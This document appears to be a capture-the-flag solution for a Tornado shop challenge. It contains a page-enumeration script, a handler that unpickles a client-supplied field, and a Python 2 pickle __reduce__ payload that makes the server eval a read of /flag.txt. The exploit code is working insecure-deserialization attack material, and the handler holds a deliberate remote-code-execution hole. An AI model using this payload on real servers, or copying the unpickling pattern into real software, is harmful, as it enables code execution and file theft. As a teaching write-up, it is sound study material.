import requests
# Walk shop pages 0..511 in order and print the first page index whose body
# mentions "lv6.png", then stop. The GET has no timeout or status check, so
# a stalled or failing response is handled exactly like any other page body.
for i in range(512):
    url = f"http://78cd9dcd-96d8-4fb8-9785-be448ad9dc9e.node3.buuoj.cn/shop?page={i}"
    response = requests.get(url=url)
    if "lv6.png" not in response.text:
        continue
    print(i)
    break
import tornado.web
from sshop.base import BaseHandler
import pickle
import urllib
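class AdminHandler(BaseHandler):
    """Request handler for the admin form page.

    GET renders ``form.html`` for the user named "admin" and ``no_ass.html``
    for any other logged-in user. POST reads the ``become`` argument,
    URL-decodes it, unpickles it and renders the resulting object into
    ``form.html``.
    """

    @tornado.web.authenticated
    def get(self, *args, **kwargs):
        """Render the admin form, or the refusal page for non-admin users."""
        if self.current_user == "admin":
            return self.render('form.html', res='This is Black Technology!', member=0)
        return self.render('no_ass.html')

    @tornado.web.authenticated
    def post(self, *args, **kwargs):
        """Unpickle the ``become`` argument and render it into the form.

        Any ordinary exception (missing argument, malformed pickle, render
        failure) falls back to the default form with ``member=0``.
        """
        # NOTE(review): unlike get(), this method never compares current_user
        # with "admin"; @tornado.web.authenticated only requires a logged-in
        # user, so every authenticated account reaches the unpickle below.
        try:
            become = self.get_argument('become')
            # SECURITY: `become` is client-controlled, and pickle.loads() calls
            # whatever callable the stream names (see __reduce__), so this
            # line lets the client run code in the server process. The call
            # is left in place because replacing it changes the wire format;
            # the fix is to parse a data-only format (e.g. JSON) and validate
            # the fields, or to drop the feature.
            p = pickle.loads(urllib.unquote(become))
            return self.render('form.html', res=p, member=1)
        except Exception:
            # Narrowed from a bare `except:` so SystemExit and
            # KeyboardInterrupt are no longer swallowed by the fallback.
            return self.render('form.html', res='This is Black Technology!', member=0)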
__reduce__ 方法在序列化(pickle.dumps)时被调用,它返回的可调用对象及其参数会在反序列化(pickle.loads)时被执行,效果类似 PHP 的 __wakeup;下面的脚本参考了王叹之的写法。这也说明服务端不应对用户可控的数据调用 pickle.loads。
import pickle
import urllib
class payload(object):
    """Object whose pickle stream tells the unpickler to call ``eval``.

    pickle stores the (callable, args) pair returned by ``__reduce__``, and
    the process that later unpickles the stream calls ``callable(*args)``.
    This is why ``pickle.loads`` on attacker-supplied bytes amounts to code
    execution; a data-only format such as JSON has no equivalent hook.
    """

    def __reduce__(self):
        # The expression is carried as a plain string; it is evaluated only
        # on the unpickling side, never while this object is being dumped.
        expression = "open('/flag.txt','r').read()"
        return eval, (expression,)
# Pickle one payload instance, percent-encode the resulting bytes (the
# inverse of the urllib.unquote step in AdminHandler.post) and print the
# encoded string. Python 2 syntax, like the handler code above.
a = urllib.quote(pickle.dumps(payload()))
print a